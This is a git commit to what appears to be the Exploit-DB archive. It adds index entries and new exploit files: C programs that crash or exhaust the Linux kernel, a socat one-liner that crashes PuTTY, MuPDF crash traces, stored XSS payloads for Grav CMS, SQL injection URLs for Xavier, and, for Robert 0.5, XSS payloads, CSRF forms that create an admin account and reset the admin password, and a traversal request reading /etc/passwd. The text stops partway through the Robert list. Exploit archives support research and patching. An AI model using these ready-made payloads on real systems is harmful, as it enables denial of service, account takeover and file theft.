DB: 2017-06-08

9 new exploits Linux Kernel - 'ping' Local Denial of Service Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service PuTTY < 0.68 - 'ssh_agent_channel_data' Integer Overflow Heap Corruption Artifex MuPDF - Null Pointer Dereference Artifex MuPDF mujstest 1.10a - Null Pointer Dereference DC/OS Marathon UI - Docker Exploit (Metasploit) Grav CMS 1.4.2 Admin Plugin - Cross-Site Scripting Xavier 2.4 - SQL Injection Robert 0.5 - Multiple Vulnerabilities
2017-06-08 05:01:17 +00:00 · 2017-06-08 05:01:17 +00:00 · b002e06bf6
commit b002e06bf6
parent 0ef7d9b9ec
10 changed files with 925 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -5530,6 +5530,11 @@ id,file,description,date,author,platform,type,port
 42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow",2017-06-05,FarazPajohan,linux,dos,0
 42123,platforms/multiple/dos/42123.txt,"Wireshark 2.2.6 - IPv6 Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
 42124,platforms/multiple/dos/42124.txt,"Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
 42135,platforms/linux/dos/42135.c,"Linux Kernel - 'ping' Local Denial of Service",2017-06-07,"Daniel Jiang",linux,dos,0
 42136,platforms/linux/dos/42136.c,"Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service",2017-06-07,"Marcus Meissner",linux,dos,0
 42137,platforms/linux/dos/42137.txt,"PuTTY < 0.68 - 'ssh_agent_channel_data' Integer Overflow Heap Corruption",2017-06-07,"Tim Kosse",linux,dos,22
 42138,platforms/linux/dos/42138.txt,"Artifex MuPDF - Null Pointer Dereference",2017-06-07,"Kamil Frankowicz",linux,dos,0
 42139,platforms/linux/dos/42139.txt,"Artifex MuPDF mujstest 1.10a - Null Pointer Dereference",2017-02-17,"Agostino Sarubbo",linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -15569,6 +15574,7 @@ id,file,description,date,author,platform,type,port
 42079,platforms/hardware/remote/42079.txt,"CERIO DT-100G-N/DT-300N/CW-300N - Multiple Vulnerabilities",2017-05-28,LiquidWorm,hardware,remote,0
 42125,platforms/macos/remote/42125.txt,"Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution",2017-06-06,saelo,macos,remote,0
 42128,platforms/windows/remote/42128.txt,"Home Web Server 1.9.1 build 164 - Remote Code Execution",2017-05-26,"Guillaume Kaddouch",windows,remote,0
 42134,platforms/python/remote/42134.rb,"DC/OS Marathon UI - Docker Exploit (Metasploit)",2017-06-07,Metasploit,python,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -37960,3 +37966,6 @@ id,file,description,date,author,platform,type,port
 42127,platforms/asp/webapps/42127.txt,"Kronos Telestaff < 2.92EU29 - SQL Injection",2017-06-05,"Goran Tuzovic",asp,webapps,0
 42129,platforms/php/webapps/42129.txt,"WordPress Plugin Tribulant Newsletters 4.6.4.2 - File Disclosure / Cross-Site Scripting",2017-06-06,defensecode,php,webapps,80
 42130,platforms/cgi/webapps/42130.txt,"Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure",2017-06-06,"X41 D-Sec GmbH",cgi,webapps,443
 42131,platforms/php/webapps/42131.txt,"Grav CMS 1.4.2 Admin Plugin - Cross-Site Scripting",2017-06-07,"Ahsan Tahir",php,webapps,0
 42132,platforms/php/webapps/42132.txt,"Xavier 2.4 - SQL Injection",2017-06-07,Vulnerability-Lab,php,webapps,0
 42133,platforms/php/webapps/42133.txt,"Robert 0.5 - Multiple Vulnerabilities",2017-06-07,"Cyril Vallicari",php,webapps,0
--- a/platforms/linux/dos/42135.c
+++ b/platforms/linux/dos/42135.c
@ -0,0 +1,30 @@
 # Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c
 #
 #include <stdio.h>
 #include <sys/socket.h>
 #include <arpa/inet.h>
 #include <stdlib.h>
 static int sockfd = 0;
 static struct sockaddr_in addr = {0};
 void fuzz(void * param){
    while(1){
        addr.sin_family = 0;//rand()%42;
        printf("sin_family1 = %08lx\n", addr.sin_family);
        connect(sockfd, (struct sockaddr *)&addr, 16); 
    }
 }
 int main(int argc, char **argv)
 {
    sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
    int thrd;
    pthread_create(&thrd, NULL, fuzz, NULL);
    while(1){
        addr.sin_family = 0x1a;//rand()%42;
        addr.sin_port = 0;
        addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        connect(sockfd, (struct sockaddr *)&addr, 16);
        addr.sin_family = 0;
    }
    return 0;
 }
--- a/platforms/linux/dos/42136.c
+++ b/platforms/linux/dos/42136.c
@ -0,0 +1,17 @@
 /*
 Source: https://bugzilla.novell.com/show_bug.cgi?id=1034862
 QA REPRODUCER:
 gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils
 ./CVE-2017-7472
 (will run the kernel out of memory)
 */
 #include <sys/types.h>
 #include <keyutils.h>
 int main()
 {
 	for (;;)
 		keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
 }
--- a/platforms/linux/dos/42137.txt
+++ b/platforms/linux/dos/42137.txt
@ -0,0 +1,24 @@
 Source: https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-agent-fwd-overflow.html
 summary: Vulnerability: integer overflow permits memory overwrite by forwarded ssh-agent connections
 class: vulnerability: This is a security vulnerability.
 difficulty: fun: Just needs tuits, and not many of them.
 priority: high: This should be fixed in the next release.
 present-in: 0.67
 fixed-in: 4ff22863d895cb7ebfced4cf923a012a614adaa8 (0.68)
 Many versions of PuTTY prior to 0.68 have a heap-corrupting integer overflow bug in the ssh_agent_channel_data function which processes messages sent by remote SSH clients to a forwarded agent connection.
 The agent protocol begins every message with a 32-bit length field, which gives the length of the remainder of the message, not including the length field itself. In order to accumulate the entire message including the length field in an internal buffer, PuTTY added 4 to the received length value, to obtain the message length inclusive of everything. This addition was unfortunately missing a check for unsigned integer overflow.
 Hence, sending a length field large enough to overflow when 4 is added to it, such as 0xFFFFFFFD, would cause PuTTY to record a value for the total message length (totallen) which was smaller than the amount of data it had already seen (lensofar, which at this point would be 4 bytes for the length field itself). Then, it would assume that the expression totallen-lensofar represented the amount of space it was safe to write into its buffer – but in fact, in the overflowing case, this value would wrap back round to a number just less than 232, far larger than the allocated heap block, and PuTTY could be induced to overwrite its heap with data sent by the attacker.
 If your server is running Linux or any reasonably similar Unix, and has the socat network utility installed, then you can use this simple proof of concept to determine whether you are affected. Simply run the shell command
 (echo -ne '\xFF\xFF\xFF\xFD\x0B'; cat /dev/zero) | socat stdio unix-connect:$SSH_AUTH_SOCK
 and PuTTY will crash.
 This bug is only exploitable at all if you have enabled SSH agent forwarding, which is turned off by default. Moreover, an attacker able to exploit this bug would have to have already be able to connect to the Unix-domain socket representing the forwarded agent connection. Since any attacker with that capability would necessarily already be able to generate signatures with your agent's stored private keys, you should in normal circumstances be defended against this vulnerability by the same precautions you and your operating system were already taking to prevent untrusted people from accessing your SSH agent.
 This vulnerability was reported by Tim Kosse, and has been assigned CVE ID CVE-2017-6542.
--- a/platforms/linux/dos/42138.txt
+++ b/platforms/linux/dos/42138.txt
@ -0,0 +1,45 @@
 Source: https://bugs.ghostscript.com/show_bug.cgi?id=697500
 POC to trigger null pointer dereference (mutool)
 After some fuzz testing I found a crashing test case.
 Git HEAD: 8eea208e099614487e4bd7cc0d67d91489dae642
 To reproduce: mutool convert -F cbz nullptr_fz_paint_pixmap_with_mask -o /dev/null
 ASAN:
 ==1406==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x000000849633 bp 0x7ffdb430c750 sp 0x7ffdb430c620 T0)
 ==1406==The signal is caused by a READ memory access.
 ==1406==Hint: address points to the zero page.
    #0 0x849632 in fz_paint_pixmap_with_mask XYZ/mupdf/source/fitz/draw-paint.c:1948:2
    #1 0x60208c in fz_draw_pop_clip XYZ/mupdf/source/fitz/draw-device.c:1618:4
    #2 0x54e716 in fz_pop_clip XYZ/mupdf/source/fitz/device.c:301:3
    #3 0x8fb76f in pdf_grestore XYZ/mupdf/source/pdf/pdf-op-run.c:338:4
    #4 0x901149 in pdf_run_xobject XYZ/mupdf/source/pdf/pdf-op-run.c:1347:5
    #5 0x8ffa0f in begin_softmask XYZ/mupdf/source/pdf/pdf-op-run.c:148:3
    #6 0x8fac2f in pdf_begin_group XYZ/mupdf/source/pdf/pdf-op-run.c:188:23
    #7 0x8fac2f in pdf_show_shade XYZ/mupdf/source/pdf/pdf-op-run.c:219
    #8 0x8fac2f in pdf_run_sh XYZ/mupdf/source/pdf/pdf-op-run.c:1943
    #9 0x92cc20 in pdf_process_keyword XYZ/mupdf/source/pdf/pdf-interpret.c:770:5
    #10 0x929741 in pdf_process_stream XYZ/mupdf/source/pdf/pdf-interpret.c:953:6
    #11 0x92870f in pdf_process_contents XYZ/mupdf/source/pdf/pdf-interpret.c:1043:3
    #12 0x8e9edc in pdf_run_page_contents_with_usage XYZ/mupdf/source/pdf/pdf-run.c:46:3
    #13 0x8e99c7 in pdf_run_page_contents XYZ/mupdf/source/pdf/pdf-run.c:69:3
    #14 0x553e12 in fz_run_page_contents XYZ/mupdf/source/fitz/document.c:318:4
    #15 0x55423b in fz_run_page XYZ/mupdf/source/fitz/document.c:350:2
    #16 0x4e8021 in runpage XYZ/mupdf/source/tools/muconvert.c:67:2
    #17 0x4e7d85 in runrange XYZ/mupdf/source/tools/muconvert.c:83:5
    #18 0x4e76c7 in muconvert_main XYZ/mupdf/source/tools/muconvert.c:165:4
    #19 0x4e6943 in main XYZ/mupdf/source/tools/mutool.c:112:12
    #20 0x7f6d6818a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #21 0x41a218 in _start (XYZ/mupdf/build/debug/mutool+0x41a218)
 AddressSanitizer can not provide additional info.
 SUMMARY: AddressSanitizer: SEGV XYZ/mupdf/source/fitz/draw-paint.c:1948:2 in fz_paint_pixmap_with_mask
 ==1406==ABORTING
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42138.zip
--- a/platforms/linux/dos/42139.txt
+++ b/platforms/linux/dos/42139.txt
@ -0,0 +1,100 @@
 Source: http://seclists.org/oss-sec/2017/q1/458
 Description:
 Mujstest, which is part of mupdf is a scriptable tester for mupdf + js.
 A crafted image posted early for another issue, causes a stack overflow.
 The complete ASan output:
 # mujstest $FILE
 ==32127==ERROR: AddressSanitizer: stack-buffer-overflow on address 
 0x7fff29560b00 at pc 0x00000047cbf3 bp 0x7fff29560630 sp 0x7fff2955fde0
 WRITE of size 1453 at 0x7fff29560b00 thread T0
    #0 0x47cbf2 in __interceptor_strcpy /tmp/portage/sys-devel/llvm-3.9.1-
 r1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:548
    #1 0x50e903 in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-
 source/platform/x11/jstest_main.c:358:7
    #2 0x7f68df3c578f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-
 r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #3 0x41bc18 in _init (/usr/bin/mujstest+0x41bc18)
 Address 0x7fff29560b00 is located in stack of thread T0 at offset 1056 in 
 frame
    #0 0x50c45f in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-
 source/platform/x11/jstest_main.c:293
  This frame has 7 object(s):
    [32, 1056) 'path'
    [1184, 2208) 'text' <== Memory access at offset 1056 partially underflows 
 this variable
    [2336, 2340) 'w' <== Memory access at offset 1056 partially underflows 
 this variable
    [2352, 2356) 'h' <== Memory access at offset 1056 partially underflows 
 this variable
    [2368, 2372) 'x' <== Memory access at offset 1056 partially underflows 
 this variable
    [2384, 2388) 'y' <== Memory access at offset 1056 partially underflows 
 this variable
    [2400, 2404) 'b' 0x1000652a4160:[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 
 f2 f2
  0x1000652a4170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000652a4180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000652a4190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000652a41a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000652a41b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==32127==ABORTING
 Affected version:
 1.10a
 Fixed version:
 N/A
 Commit fix:
 N/A
 Credit:
 This bug was discovered by Agostino Sarubbo of Gentoo.
 CVE:
 CVE-2017-6060
 Reproducer:
 https://github.com/asarubbo/poc/blob/master/00147-mupdf-mujstest-stackoverflow-main
 Timeline:
 2017-02-05: bug discovered and reported to upstream
 2017-02-17: blog post about the issue
 2017-02-17: CVE assigned via cveform.mitre.org
 Note:
 This bug was found with Address Sanitizer.
 Permalink:
 https://blogs.gentoo.org/ago/2017/02/17/mupdf-mujstest-stack-based-buffer-overflow-in-main-jstest_main-c
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42139.zip
--- a/platforms/php/webapps/42131.txt
+++ b/platforms/php/webapps/42131.txt
@ -0,0 +1,75 @@
 # Exploit Title: GravCMS Core (Admin Plugin) v1.4.2 - Persistent Cross-Site Scripting
 # Date: 2017-06-07
 # Exploit Author: Ahsan Tahir
 # Vendor Homepage: https://getgrav.org/
 # Software Link: https://getgrav.org/download/core/grav-admin/1.2.4
 # Version: 1.4.2
 # Tested on: [Kali Linux 2.0 | Windows 8.1]
 # Email: mrahsan1337@gmail.com
 # Contact: https://twitter.com/AhsanTahirAT
 Release Date:
 =============
 2017-06-07
 Product & Service Introduction:
 ===============================
 Grav is built and maintained by a team of dedicated and passionate developers, designers and users. 
 As Grav is an open source project we greatly appreciate user contribution and commitment. These are the key folks that make this all possible.
 Abstract Advisory Information:
 ==============================
 Ahsan Tahir, an independent vulnerability researcher discovered a Persistent Cross-Site Scripting Vulnerability in GravCMS Admin Plugin (v 1.4.2)
 Vulnerability Disclosure Timeline:
 ==================================
 2017-06-07: Found the vulnerability.
 2017-06-07: Reported to vendor.
 2017-06-07: Published.
 Discovery Status:
 =================
 Published
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ===============
 Medium
 Technical Details & Description:
 ================================
 The security risk of the xss vulnerability is estimated as medium with a common vulnerability scoring system count of 3.6. 
 Exploitation of the persistent xss web vulnerability requires a limited admin user account and only low user interaction. 
 Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external 
 redirect to malicious sources and persistent manipulation of affected or connected web module context.
 Proof of Concept (PoC):
 =======================
 The persistent input validation vulnerability can be exploited by restricted user accounts with low user interaction.
 For security demonstraton or to reproduce the vulnerability follow the provided information and steps below to continue.
 Payload (Exploitation): [Click Me](javascript:alert(1))
 [+] Manual steps to reproduce ..
 1. Login with the admin or editor account in GravCMS
 2. Go to edit page option (e.g http://127.0.0.1/cms/grav-admin/admin/pages/home)
 3. Put the payload "[Click Me](javascript:alert(1))" (without quotes) in the content of page
 4. Save Page!
 5. Go to the index page (e.g http://127.0.0.1/cms/grav-admin/)
 6. Click on "Click Me"
 7. The Javascript execution occurs - Successful reproduce of the persistent cross site scripting vulnerability!
 Credits & Authors:
 ==================
 Ahsan Tahir - [https://twitter.com/AhsanTahirAT]
--- a/platforms/php/webapps/42132.txt
+++ b/platforms/php/webapps/42132.txt
@ -0,0 +1,234 @@
 Document Title:
 ===============
 Xavier v2.4 PHP MP - SQL Injection Web Vulnerabilities
 References (Source):
 ====================
 https://www.vulnerability-lab.com/get_content.php?id=2076
 Release Date:
 =============
 2017-06-06
 Vulnerability Laboratory ID (VL-ID):
 ====================================
 2076
 Common Vulnerability Scoring System:
 ====================================
 5.3
 Vulnerability Class:
 ====================
 SQL Injection
 Current Estimated Price:
 ========================
 1.000€ - 2.000€
 Product & Service Introduction:
 ===============================
 The script can easily be dropped in to an existing website allowing you to protect pages by adding one line of PHP code at the top of a page. 
 You can also protect sections of pages. Secure your web pages or sections of content dependant on whether your users are logged in or out, 
 or whether they are a member of a User Group. Or secure your pages dependent on whether you are logged on as an administrator.
 (Copy of the Homepage:  https://codecanyon.net/item/xavier-php-login-script-user-management/9146226 )
 Abstract Advisory Information:
 ==============================
 The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Xavier PHP Login Script & User Management Admin Panel v2.4 web-application.
 Vulnerability Disclosure Timeline:
 ==================================
 2017-06-06: Public Disclosure (Vulnerability Laboratory)
 Discovery Status:
 =================
 Published
 Affected Product(s):
 ====================
 Siggles
 Product: Xavier - PHP Login Script & User Management Admin Panel 2.4
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ===============
 Medium
 Technical Details & Description:
 ================================
 Multiple sql-injection vulnerabilities has been discovered in the Xavier PHP Login Script & User Management Admin Panel web-application.
 The issue allows remote attackers to inject own malicious sql commands to compromise the web-application & database management system.
 The sql-injection vulnerabilities are located in the `usertoedit` and `log_id` parameters of the `adminuserdit.php` and `editgroup.php` files.
 Remote attackers with privileged user accounts are able to compromise the web-application and database management system by injection of sql 
 commands via GET method request. The attacker vector is client-side and the request method to inject the sql commands is GET. The vulnerability 
 is a classic order by sql-injection.
 The security risk of the sql-injection web vulnerability is estimated as medium with a common vulnerability scoring system count of 5.3. 
 Exploitation of the remote sql-injection web vulnerability requires an authenticated web-application user account and no user interaction. 
 Successful exploitation of the sql-injection web vulnerability results in web-application or database management system compromise.
 Request Method(s):
 [+] GET
 Vulnerable File(s):
 [+] adminuseredit.php
 [+] editgroup.php
 Vulnerable Parameter(s):
 [+] usertoedit
 [+] log_id
 Proof of Concept (PoC):
 =======================
 The remote sql-injection vulnerability can be exploited by authenticated user accounts without user interaction.
 For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
 PoC: Example
 https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=[SQL-INJECTION VULNERABILITY!]
 https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=[SQL-INJECTION VULNERABILITY!]
 PoC: Exploitation
 https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=1%20order%20by%203--
 https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=1%20order%20by%203--
 --- SQL Error & Exception Logs ---
 Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42S22]: 
 Column not found: 1054 Unknown column '100' in 'order clause'' 
 in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300 Stack trace: 
 #0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...') 
 #1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), '1 order by 100-...') 
 #2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300
 -
 Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: 
 Syntax error or access violation: 1064 You have an error in your SQL syntax; 
 check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' 
 in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300 Stack trace: 
 #0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...') 
 #1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), ''') 
 #2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300
 -
 Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: 
 Syntax error or access violation: 1064 You have an error in your SQL syntax; 
 check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1' 
 in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:59 Stack trace: 
 #0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(59): PDO->query('SELECT username...') 
 #1 /home/angry/public_html/xavier-demo/admin/adminuseredit.php(26): Functions->usernameTaken('-1' -1'') 
 #2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 59
 --- PoC Session Logs [GET] ---
 Status: 200[OK]
 GET https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=%27[SQL-INJECTION VULNERABILITY!]-- 
 Mime Type[text/html]
   Request Header:
      Host[xavier-php.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Cookie[PHPSESSID=6b9f9560a6a0d35b12b8603424cf2525]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Server[Apache]
      Keep-Alive[timeout=2, max=100]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html]
 -
 20:49:05.559[216ms][total 277ms] Status: 200[OK]
 GET https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=%27[SQL-INJECTION VULNERABILITY!]-- 
 Mime Type[text/html]
   Request Header:
      Host[xavier-php.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Cookie[PHPSESSID=6b9f9560a6a0d35b12b8603424cf2525]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Server[Apache]
      Keep-Alive[timeout=2, max=100]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html]
 Reference(s):
 https://xavier-php.localhost:8080/
 https://xavier-php.localhost:8080/xavier/
 https://xavier-php.localhost:8080/xavier/admin/
 https://xavier-php.localhost:8080/xavier/admin/editgroup.php
 https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php
 Solution - Fix & Patch:
 =======================
 The vulnerability can be patched by a parse via escape of the vulnerable parameters in the affected php files.
 Restrict the prameter input and use a prepared statement to secure the functions of the admin panel.
 Disallow to preview errors in the php code of the panel to prevent attacks.
 Security Risk:
 ==============
 The security risk of the sql-injection vulnerability in the web panel of the xavier application is estimated as medium (CVSS 5.3).
 Credits & Authors:
 ==================
 Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
 Disclaimer & Information:
 =========================
 The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
 implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
 case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
 suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
 or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
 websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
 or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
 phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 
 Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
 Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
 Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
 Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
 Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
 Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
 Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
 of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
 				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
 -- 
 VULNERABILITY LABORATORY - RESEARCH TEAM
 SERVICE: www.vulnerability-lab.com
--- a/platforms/php/webapps/42133.txt
+++ b/platforms/php/webapps/42133.txt
@ -0,0 +1,196 @@
 # Exploit Title: Robert 0.5 - Multiple Vulnerabilities XSS, CSRF, Directory
 traversal & SQLi
 # Date: 07/06/2017
 # Exploit Author: Cyril Vallicari / HTTPCS - ZIWIT
 # Vendor website :http://robert.polosson.com/
 # Download link : https://github.com/RobertManager/robert/archive/master.zip
 # Live demo : http://robertdemo.polosson.com/
 # Version: 0.5
 # Tested on: Windows 7 x64 SP1 / Kali Linux
 Web-application open-source management of equipment park for rental or loan.
 Written in HTML, PHP, MySQL, CSS and Javascript.
 Description : Multiple security issues have been found :  XSS, CSRF,
 Directory Traversal, SQLi
 1- XSS reflected
 http://192.168.3.215/robert/index.php?go=infos%22%3E%3Cscript%3Ealert(1)%3C/script%3E
 param vuln : go
 script vuln : index.php
 2- XSS reflected
 POST /robert/modals/personnel_list_techniciens.php
 data :
 searchingfor=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&searchingwhat=surnom
 param vuln : searchingfor
 script vuln : personnel_list_techniciens.php
 3- XSS Stored
 POST /robert/fct/matos_actions.php
 data:
 action=addMatos&label=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&ref="><script>alert(1)</script>&categorie=son&sousCateg=0&Qtotale=1&dateAchat=&tarifLoc=1&valRemp=1&externe=0&ownerExt=&remarque=%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E
 param vuln : label, ref et remarque
 script vuln : matos_actions.php
 4- XSS Stored
 POST /robert/fct/packs_actions.php
 data
 :action=addPack&label=%22%3E%3Cscript%3Ealert(5)%3C%2Fscript%3E&ref="><script>alert(4)</script>&categorie=son&detail=undefined&externe=0&remarque=%22%3E%3Cscript%3Ealert(6)%3C%2Fscript%3E&detail={"2":1}
 param vuln : label, ref et remarque
 script vuln : packs_actions.php
 5- XSS stored
 POST /robert/fct/beneficiaires_actions.php
 action=modif&id=2&surnom="><script>alert(7)</script>&GUSO=&CS=&prenom="><script>alert(8)</script>&nom="><script>alert(9)</script>&email=&tel=&birthDay=0000-00-00&birthPlace=&habilitations=undefined&categorie=regisseur&SECU=&SIRET=N/A&intermittent=0&adresse=&cp=&ville=&assedic=
 param vuln : surnom, prenom, nom
 script vuln : beneficiaires_actions.php
 6- XSS stored
 POST /robert/fct/tekos_actions.php
 action=addStruct&id=1&label=test%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&NomRS=&type="><script>alert(3)</script>&adresse=test"><script>alert(4)</script>&codePostal=12312&ville="><script>alert(5)</script>&email="><script>alert(6)</script>&tel=&SIRET="><script>alert(8)</script>&remarque=%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E
 param vuln : label, type, adresse, ville, email, SIRET et remarque
 script vuln : beneficiaires_actions.php
 7- CSRF Create new admin
 <form action="http://192.168.3.215/robert/fct/user_actions.php"
 method="POST">
 <input type="hidden" name="action" value="create"/>
 <input type="hidden" name="cMail" value="hacked@hacked.com"/>
 <input type="hidden" name="cName" value="hacked"/>
 <input type="hidden" name="cPren" value="hacked"/>
 <input type="hidden" name="cPass" value="hacked"/>
 <input type="hidden" name="cLevel" value="7"/>
 <input type="hidden" name="cTekos" value="0"/>
 <input type="submit" value="CSRFED This Shit"/>
 </form>
 8- CSRF Change admin password and infos
 <form action="http://192.168.3.215/robert/fct/user_actions.php"
 method="POST">
 <input type="hidden" name="action" value="modifOwnUser"/>
 <input type="hidden" name="id" value="1"/>
 <input type="hidden" name="email" value="hacked"/>
 <input type="hidden" name="nom" value="hacked"/>
 <input type="hidden" name="prenom" value="hacked"/>
 <input type="hidden" name="password" value="hacked"/>
 <input type="submit" value="CSRFED This Shit"/>
 </form>
 9- Directory traversal on Download fonction ( Read Arbitrary File)
 http://192.168.3.215/robert/fct/downloader.php?dir=sql&file=../../../../../../etc/passwd
 param vuln : file
 script vuln : downloader.php
 10- Directory traversal on Upload fonction (Upload file in root path)
